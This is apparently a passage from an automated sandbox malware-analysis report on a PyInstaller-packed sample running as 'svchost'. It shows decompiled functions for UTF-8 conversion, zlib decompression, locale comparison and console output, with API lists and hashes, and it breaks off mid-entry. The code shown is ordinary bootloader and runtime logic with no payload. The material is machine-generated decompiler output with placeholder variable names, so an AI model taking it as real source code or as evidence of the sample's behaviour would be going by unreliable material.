                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,00BC210F,?,?,00000000,?,00000000), ref: 00BC39E7
                            Strings
                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00BC39FC
                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00BC39B3
                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00BC3A3F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentExpandMultiStringsWide
                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                            • API String ID: 2001182103-3498232454
                            • Opcode ID: 92471abe6d23320bbf0de72325d3c0be72332adb09962964ebaf1c97c919303d
                            • Instruction ID: f951d37ae600e750f31c500ac0d651e434b97c26fc60ae661032f4d3ecb39b96
                            • Opcode Fuzzy Hash: 92471abe6d23320bbf0de72325d3c0be72332adb09962964ebaf1c97c919303d
                            • Instruction Fuzzy Hash: E431ECB6A442006BE624F368AC47F9F72D8EF84750F44456DFB49D7282FEB49900C697
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E00BC4A10(void* __ecx, void* __edx, void* __eflags) {
                            				int* _t18;
                            				char* _t21;
                            				short* _t22;
                            				char* _t28;
                            				int* _t31;
                            				void* _t34;
                            				char* _t36;
                            				int* _t41;
                            				signed int _t42;
                            				signed int _t44;
                            				int _t45;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            
                            				_t34 = __edx;
                            				_t44 =  *(_t46 + 0x14);
                            				_push(4);
                            				_push(_t44 + 1);
                            				_t18 = E00BC97F8(__ecx);
                            				_t31 = _t18;
                            				_t47 = _t46 + 8;
                            				if(_t31 != 0) {
                            					_t36 = 0;
                            					__eflags = _t44;
                            					if(_t44 <= 0) {
                            						L16:
                            						_t31[_t44] = 0;
                            						return _t31;
                            					} else {
                            						_t41 = _t31;
                            						_t21 =  *(_t47 + 0x20) - _t31;
                            						__eflags = _t21;
                            						 *(_t47 + 0x20) = _t21;
                            						while(1) {
                            							_t22 = _t21[_t41];
                            							 *(_t47 + 0x30) = _t22;
                            							_t45 = WideCharToMultiByte(0xfde9, 0, _t22, 0xffffffff, 0, 0, 0, 0);
                            							__eflags = _t45;
                            							if(__eflags == 0) {
                            								break;
                            							}
                            							_t7 = _t45 + 1; // 0x1
                            							_push(1);
                            							_push(_t7);
                            							_t28 = E00BC97F8(_t7);
                            							_t47 = _t47 + 8;
                            							 *(_t47 + 0x14) = _t28;
                            							__eflags = _t28;
                            							if(__eflags == 0) {
                            								_push("Out of memory.");
                            								_push("win32_utils_to_utf8");
                            								goto L13;
                            							} else {
                            								__eflags = WideCharToMultiByte(0xfde9, 0,  *(_t47 + 0x24), 0xffffffff, _t28, _t45, 0, 0);
                            								if(__eflags == 0) {
                            									_push("Failed to encode wchar_t as UTF-8.\n");
                            									L12:
                            									_push("WideCharToMultiByte");
                            									L13:
                            									E00BC1860(_t34, __eflags);
                            									_t48 = _t47 + 8;
                            									 *_t41 = 0;
                            									_t42 = 0;
                            									__eflags = _t36;
                            									if(_t36 >= 0) {
                            										do {
                            											L00BC9803(_t31[_t42]);
                            											_t42 = _t42 + 1;
                            											_t48 = _t48 + 4;
                            											__eflags = _t42 - _t36;
                            										} while (_t42 <= _t36);
                            									}
                            									L00BC9803(_t31);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t36 =  &(_t36[1]);
                            									_t44 =  *(_t47 + 0x1c);
                            									 *_t41 =  *(_t47 + 0x14);
                            									_t41 =  &(_t41[1]);
                            									__eflags = _t36 - _t44;
                            									if(_t36 >= _t44) {
                            										goto L16;
                            									} else {
                            										_t21 =  *(_t47 + 0x20);
                            										continue;
                            									}
                            								}
                            							}
                            							goto L17;
                            						}
                            						_push("Failed to get UTF-8 buffer size.\n");
                            						goto L12;
                            					}
                            				} else {
                            					return _t18;
                            				}
                            				L17:
                            			}


















                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 00BC4A69
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 00BC4A9E
                            Strings
                            • Failed to encode wchar_t as UTF-8., xrefs: 00BC4AC0
                            • WideCharToMultiByte, xrefs: 00BC4AD8
                            • Failed to get UTF-8 buffer size., xrefs: 00BC4AD3
                            • Out of memory., xrefs: 00BC4AC7
                            • win32_utils_to_utf8, xrefs: 00BC4ACC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 626452242-3595433791
                            • Opcode ID: bf3de860c0e8ee18e01cb18fb08c25fa16f28ed3757b14110513df5ef1dc0b6b
                            • Instruction ID: 28a51685537028af42270ae5cf207273e0cfcec2e519b51576db300d89958a73
                            • Opcode Fuzzy Hash: bf3de860c0e8ee18e01cb18fb08c25fa16f28ed3757b14110513df5ef1dc0b6b
                            • Instruction Fuzzy Hash: 78318B757843056BEB20AF58AC82F5673D4EB40711F1005AEFE45B72C1EBB6EA048362
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E00BC1030(void* __eax, void* __ecx, void* __eflags, intOrPtr _a8) {
                            				intOrPtr _v0;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v44;
                            				intOrPtr _v52;
                            				intOrPtr _v60;
                            				char _v68;
                            				intOrPtr _t20;
                            				intOrPtr _t35;
                            				intOrPtr _t36;
                            
                            				_t35 = _a8;
                            				_push( *((intOrPtr*)(_t35 + 0xc)));
                            				L00BC7864();
                            				_t36 = E00BC9808(__ecx);
                            				_t46 = _t36;
                            				if(_t36 != 0) {
                            					_t20 = _v0;
                            					_push( *((intOrPtr*)(_t35 + 8)));
                            					_v28 = 0;
                            					_v24 = 0;
                            					_v20 = 0;
                            					_v60 = _t20;
                            					L00BC7864();
                            					_push( *((intOrPtr*)(_t35 + 0xc)));
                            					_v60 = _t20;
                            					_v52 = _t36;
                            					L00BC7864();
                            					_v52 = _t20;
                            					__eflags = E00BC6720( &_v68, "1.2.11", 0x38);
                            					if(__eflags < 0) {
                            						_push(_v44);
                            						E00BC1980(__eflags, "Error %d from inflateInit: %s\n", _t22);
                            						__eflags = 0;
                            						return 0;
                            					} else {
                            						_push(4);
                            						_push( &_v68);
                            						__eflags = E00BC4E60();
                            						if(__eflags < 0) {
                            							_push(_v44);
                            							E00BC1980(__eflags, "Error %d from inflate: %s\n", _t26);
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							E00BC65F0( &_v68);
                            							return _t36;
                            						}
                            					}
                            				} else {
                            					_push("Error allocating decompression buffer\n");
                            					E00BC1980(_t46);
                            					return 0;
                            				}
                            			}















                            APIs
                            Strings
                            • Error %d from inflateInit: %s, xrefs: 00BC1100
                            • 1.2.11, xrefs: 00BC10A7
                            • Error allocating decompression buffer, xrefs: 00BC1050
                            • Error %d from inflate: %s, xrefs: 00BC10E6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: 1.2.11$Error %d from inflate: %s$Error %d from inflateInit: %s$Error allocating decompression buffer
                            • API String ID: 2009864989-3188157777
                            • Opcode ID: 31ccc3921db0021fe0bc80bed3bc71683732f9e70f97cebc530492cf8c4a261d
                            • Instruction ID: e5c1ba176d3c1876a0215c86f5bd1a3bde88b310cd2e9ecc556d1372a6960c80
                            • Opcode Fuzzy Hash: 31ccc3921db0021fe0bc80bed3bc71683732f9e70f97cebc530492cf8c4a261d
                            • Instruction Fuzzy Hash: 24216575A043416BD700FA69AC06F8FBBD4EF81358F4448BDFA4892212F775D2598B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %U?%zu$Failed to append to sys.path$Installing PYZ: Could not get sys.path$path$strict$utf-8
                            • API String ID: 2009864989-2673223963
                            • Opcode ID: d919a72e55e06a7fcb30915f1284a40a44de428029f01fff4c63c1ae6382db39
                            • Instruction ID: 31f891c580e2564fbc97db742532c986db7451c797b9f0bb3c9de0fb371dc619
                            • Opcode Fuzzy Hash: d919a72e55e06a7fcb30915f1284a40a44de428029f01fff4c63c1ae6382db39
                            • Instruction Fuzzy Hash: 1A1134726002816FCB016B6ADC8AE5A7BD8EE9175170885E4FC069B213EB31EA41C6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E00BC4C90(char* _a4, short* _a8, int _a12) {
                            				void* _t17;
                            				void* _t18;
                            				int _t19;
                            				char* _t20;
                            				void* _t21;
                            
                            				_t20 = _a4;
                            				if(_t20 != 0) {
                            					_t19 = _a12;
                            					goto L6;
                            				} else {
                            					_t19 = WideCharToMultiByte(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20, _t20, _t20);
                            					_t26 = _t19;
                            					if(_t19 != 0) {
                            						_t3 = _t19 + 1; // 0x1
                            						_push(1);
                            						_t20 = E00BC97F8(_t17);
                            						_t21 = _t21 + 8;
                            						__eflags = _t20;
                            						if(__eflags != 0) {
                            							L6:
                            							__eflags = WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff, _t20, _t19, 0, 0);
                            							if(__eflags != 0) {
                            								return _t20;
                            							} else {
                            								_push("Failed to encode wchar_t as UTF-8.\n");
                            								_push("WideCharToMultiByte");
                            								E00BC1860(_t18, __eflags);
                            								__eflags = 0;
                            								return 0;
                            							}
                            						} else {
                            							_push("Out of memory.");
                            							_push("win32_utils_to_utf8");
                            							E00BC1860(_t18, __eflags);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Failed to get UTF-8 buffer size.\n");
                            						_push("WideCharToMultiByte");
                            						E00BC1860(_t18, _t26);
                            						return 0;
                            					}
                            				}
                            			}









                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4CAA
                              • Part of subcall function 00BC1860: GetLastError.KERNEL32(?,?), ref: 00BC187D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,00BC48EC,00BF4A58,?,00001000,?,?), ref: 00BC4D0F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 1717984340-3595433791
                            • Opcode ID: 648fad8e1045e8a575f9407f809e1d32d8cb5f5af8084f26118107b8a5d342eb
                            • Instruction ID: d3422c8694c129bf29911653c36ccd69e2a648edbf9ef237a12c271acb6b77de
                            • Opcode Fuzzy Hash: 648fad8e1045e8a575f9407f809e1d32d8cb5f5af8084f26118107b8a5d342eb
                            • Instruction Fuzzy Hash: FA012B3B79927136D62031AF7C1AF8B29C8CB81BB1F250AE5FA04F61E2D760D90241F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E00BDD04A(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                            				signed int _v8;
                            				char _v22;
                            				struct _cpinfo _v28;
                            				short* _v32;
                            				int _v36;
                            				char* _v40;
                            				int _v44;
                            				intOrPtr _v48;
                            				void* _v60;
                            				signed int _t63;
                            				short* _t68;
                            				int _t69;
                            				signed int _t71;
                            				short* _t72;
                            				signed int _t75;
                            				short* _t85;
                            				int _t93;
                            				intOrPtr _t96;
                            				intOrPtr _t97;
                            				signed int _t107;
                            				char* _t109;
                            				char* _t110;
                            				void* _t115;
                            				void* _t116;
                            				intOrPtr _t117;
                            				intOrPtr _t118;
                            				intOrPtr* _t120;
                            				short* _t122;
                            				int _t124;
                            				int _t126;
                            				short* _t127;
                            				intOrPtr* _t128;
                            				signed int _t129;
                            				short* _t130;
                            
                            				_t63 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t63 ^ _t129;
                            				_t124 = _a20;
                            				_v44 = _a4;
                            				_v48 = _a8;
                            				_t67 = _a24;
                            				_v40 = _a24;
                            				_t120 = _a16;
                            				_v36 = _t120;
                            				if(_t124 <= 0) {
                            					if(_t124 >= 0xffffffff) {
                            						goto L2;
                            					} else {
                            						goto L5;
                            					}
                            				} else {
                            					_t124 = E00BDCA63(_t120, _t124);
                            					_t67 = _v40;
                            					L2:
                            					_t93 = _a28;
                            					if(_t93 <= 0) {
                            						if(_t93 < 0xffffffff) {
                            							goto L5;
                            						} else {
                            							goto L7;
                            						}
                            					} else {
                            						_t93 = E00BDCA63(_t67, _t93);
                            						L7:
                            						_t69 = _a32;
                            						if(_t69 == 0) {
                            							_t69 =  *( *_v44 + 8);
                            							_a32 = _t69;
                            						}
                            						if(_t124 == 0 || _t93 == 0) {
                            							if(_t124 != _t93) {
                            								if(_t93 <= 1) {
                            									if(_t124 <= 1) {
                            										if(GetCPInfo(_t69,  &_v28) == 0) {
                            											goto L5;
                            										} else {
                            											if(_t124 <= 0) {
                            												if(_t93 <= 0) {
                            													goto L36;
                            												} else {
                            													_t68 = 2;
                            													if(_v28 >= _t68) {
                            														_t109 =  &_v22;
                            														if(_v22 != 0) {
                            															_t128 = _v40;
                            															while(1) {
                            																_t117 =  *((intOrPtr*)(_t109 + 1));
                            																if(_t117 == 0) {
                            																	goto L15;
                            																}
                            																_t96 =  *_t128;
                            																if(_t96 <  *_t109 || _t96 > _t117) {
                            																	_t109 = _t109 + _t68;
                            																	if( *_t109 != 0) {
                            																		continue;
                            																	} else {
                            																		goto L15;
                            																	}
                            																}
                            																goto L63;
                            															}
                            														}
                            													}
                            													goto L15;
                            												}
                            											} else {
                            												_t68 = 2;
                            												if(_v28 >= _t68) {
                            													_t110 =  &_v22;
                            													if(_v22 != 0) {
                            														while(1) {
                            															_t118 =  *((intOrPtr*)(_t110 + 1));
                            															if(_t118 == 0) {
                            																goto L17;
                            															}
                            															_t97 =  *_t120;
                            															if(_t97 <  *_t110 || _t97 > _t118) {
                            																_t110 = _t110 + _t68;
                            																if( *_t110 != 0) {
                            																	continue;
                            																} else {
                            																	goto L17;
                            																}
                            															}
                            															goto L63;
                            														}
                            													}
                            												}
                            												goto L17;
                            											}
                            										}
                            									} else {
                            										L17:
                            										_push(3);
                            										goto L13;
                            									}
                            								} else {
                            									L15:
                            									_t68 = 1;
                            								}
                            							} else {
                            								_push(2);
                            								L13:
                            								_pop(_t68);
                            							}
                            						} else {
                            							L36:
                            							_t122 = 0;
                            							_t71 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
                            							_v44 = _t71;
                            							if(_t71 == 0) {
                            								L5:
                            								_t68 = 0;
                            							} else {
                            								_t115 = _t71 + _t71;
                            								asm("sbb eax, eax");
                            								if((_t115 + 0x00000008 & _t71) == 0) {
                            									_t72 = 0;
                            									_v32 = 0;
                            									goto L45;
                            								} else {
                            									asm("sbb eax, eax");
                            									_t83 = _t71 & _t115 + 0x00000008;
                            									_t107 = _t115 + 8;
                            									if((_t71 & _t115 + 0x00000008) > 0x400) {
                            										asm("sbb eax, eax");
                            										_t85 = E00BD0A25(_t107, _t83 & _t107);
                            										_v32 = _t85;
                            										if(_t85 == 0) {
                            											goto L61;
                            										} else {
                            											 *_t85 = 0xdddd;
                            											goto L43;
                            										}
                            									} else {
                            										asm("sbb eax, eax");
                            										E00BDF250();
                            										_t85 = _t130;
                            										_v32 = _t85;
                            										if(_t85 == 0) {
                            											L61:
                            											_t95 = _v32;
                            										} else {
                            											 *_t85 = 0xcccc;
                            											L43:
                            											_t72 =  &(_t85[4]);
                            											_v32 = _t72;
                            											L45:
                            											if(_t72 == 0) {
                            												goto L61;
                            											} else {
                            												_t126 = _a32;
                            												if(MultiByteToWideChar(_t126, 1, _v36, _t124, _t72, _v44) == 0) {
                            													goto L61;
                            												} else {
                            													_t75 = MultiByteToWideChar(_t126, 9, _v40, _t93, _t122, _t122);
                            													_v36 = _t75;
                            													if(_t75 == 0) {
                            														goto L61;
                            													} else {
                            														_t116 = _t75 + _t75;
                            														_t103 = _t116 + 8;
                            														asm("sbb eax, eax");
                            														if((_t116 + 0x00000008 & _t75) == 0) {
                            															_t127 = _t122;
                            															goto L56;
                            														} else {
                            															asm("sbb eax, eax");
                            															_t79 = _t75 & _t116 + 0x00000008;
                            															_t103 = _t116 + 8;
                            															if((_t75 & _t116 + 0x00000008) > 0x400) {
                            																asm("sbb eax, eax");
                            																_t127 = E00BD0A25(_t103, _t79 & _t103);
                            																_pop(_t103);
                            																if(_t127 == 0) {
                            																	goto L59;
                            																} else {
                            																	 *_t127 = 0xdddd;
                            																	goto L54;
                            																}
                            															} else {
                            																asm("sbb eax, eax");
                            																E00BDF250();
                            																_t127 = _t130;
                            																if(_t127 == 0) {
                            																	L59:
                            																	_t95 = _v32;
                            																} else {
                            																	 *_t127 = 0xcccc;
                            																	L54:
                            																	_t127 =  &(_t127[4]);
                            																	L56:
                            																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t127, _v36) == 0) {
                            																		goto L59;
                            																	} else {
                            																		_t95 = _v32;
                            																		_t122 = E00BD36EC(_t103, _v48, _a12, _v32, _v44, _t127, _v36, _t122, _t122, _t122);
                            																	}
                            																}
                            															}
                            														}
                            														E00BD815E(_t127);
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            								E00BD815E(_t95);
                            								_t68 = _t122;
                            							}
                            						}
                            					}
                            				}
                            				L63:
                            				E00BC786A();
                            				return _t68;
                            			}

                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 00BDD0F6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD179
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00BDD323,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD20C
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD223
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00BDD323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 00BDD29F
                            • __freea.LIBCMT ref: 00BDD2CA
                            • __freea.LIBCMT ref: 00BDD2D6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 2829977744-0
                            • Opcode ID: 2655322e76336cd0bac6c9202dabf7607b5dc35e2a1e1eb1e2a99744b668d1b8
                            • Instruction ID: cbc6ff2ff7744bd0ac4fe4746636e6c4994cd0ce33527a982455dce171433b72
                            • Opcode Fuzzy Hash: 2655322e76336cd0bac6c9202dabf7607b5dc35e2a1e1eb1e2a99744b668d1b8
                            • Instruction Fuzzy Hash: FE919F71E0021A9ADB209EA4CC91AEEFBF5EF49710F1445ABE885E7341FB25DC45C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E00BD2A10(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				signed char _v15;
                            				char _v16;
                            				void _v24;
                            				short _v28;
                            				char _v31;
                            				void _v32;
                            				long _v36;
                            				intOrPtr _v40;
                            				void* _v44;
                            				signed int _v48;
                            				signed char* _v52;
                            				long _v56;
                            				int _v60;
                            				void* __ebx;
                            				signed int _t78;
                            				signed int _t80;
                            				int _t86;
                            				void* _t93;
                            				long _t96;
                            				void _t104;
                            				void* _t111;
                            				signed int _t115;
                            				signed int _t118;
                            				signed char _t123;
                            				signed char _t128;
                            				intOrPtr _t129;
                            				signed int _t131;
                            				signed char* _t133;
                            				intOrPtr* _t136;
                            				signed int _t138;
                            				void* _t139;
                            
                            				_t78 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t78 ^ _t138;
                            				_t80 = _a8;
                            				_t118 = _t80 >> 6;
                            				_t115 = (_t80 & 0x0000003f) * 0x30;
                            				_t133 = _a12;
                            				_v52 = _t133;
                            				_v48 = _t118;
                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xbf6108 + _t118 * 4)) + _t115 + 0x18));
                            				_v40 = _a16 + _t133;
                            				_t86 = GetConsoleCP();
                            				_t136 = _a4;
                            				_v60 = _t86;
                            				 *_t136 = 0;
                            				 *((intOrPtr*)(_t136 + 4)) = 0;
                            				 *((intOrPtr*)(_t136 + 8)) = 0;
                            				while(_t133 < _v40) {
                            					_v28 = 0;
                            					_v31 =  *_t133;
                            					_t129 =  *((intOrPtr*)(0xbf6108 + _v48 * 4));
                            					_t123 =  *(_t129 + _t115 + 0x2d);
                            					if((_t123 & 0x00000004) == 0) {
                            						if(( *(E00BD7D33(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                            							_push(1);
                            							_push(_t133);
                            							goto L8;
                            						} else {
                            							if(_t133 >= _v40) {
                            								_t131 = _v48;
                            								 *((char*)( *((intOrPtr*)(0xbf6108 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                            								 *( *((intOrPtr*)(0xbf6108 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xbf6108 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                            							} else {
                            								_t111 = E00BD3F5B( &_v28, _t133, 2);
                            								_t139 = _t139 + 0xc;
                            								if(_t111 != 0xffffffff) {
                            									_t133 =  &(_t133[1]);
                            									goto L9;
                            								}
                            							}
                            						}
                            					} else {
                            						_t128 = _t123 & 0x000000fb;
                            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                            						_push(2);
                            						_v15 = _t128;
                            						 *(_t129 + _t115 + 0x2d) = _t128;
                            						_push( &_v16);
                            						L8:
                            						_push( &_v28);
                            						_t93 = E00BD3F5B();
                            						_t139 = _t139 + 0xc;
                            						if(_t93 != 0xffffffff) {
                            							L9:
                            							_t133 =  &(_t133[1]);
                            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                            							_v56 = _t96;
                            							if(_t96 != 0) {
                            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                            									L19:
                            									 *_t136 = GetLastError();
                            								} else {
                            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                            									if(_v36 >= _v56) {
                            										if(_v31 != 0xa) {
                            											goto L16;
                            										} else {
                            											_t104 = 0xd;
                            											_v32 = _t104;
                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                            												goto L19;
                            											} else {
                            												if(_v36 >= 1) {
                            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                            													goto L16;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            					goto L20;
                            					L16:
                            				}
                            				L20:
                            				E00BC786A();
                            				return _t136;
                            			}

                            APIs
                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00BD3185,?,00000000,?,00000000,00000000), ref: 00BD2A52
                            • __fassign.LIBCMT ref: 00BD2ACD
                            • __fassign.LIBCMT ref: 00BD2AE8
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00BD2B0E
                            • WriteFile.KERNEL32(?,?,00000000,00BD3185,00000000,?,?,?,?,?,?,?,?,?,00BD3185,?), ref: 00BD2B2D
                            • WriteFile.KERNEL32(?,?,00000001,00BD3185,00000000,?,?,?,?,?,?,?,?,?,00BD3185,?), ref: 00BD2B66
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 145f39dbe073f4c18607e04b04c74ebafb8467eb685fea9a1f4eebbeaa29d367
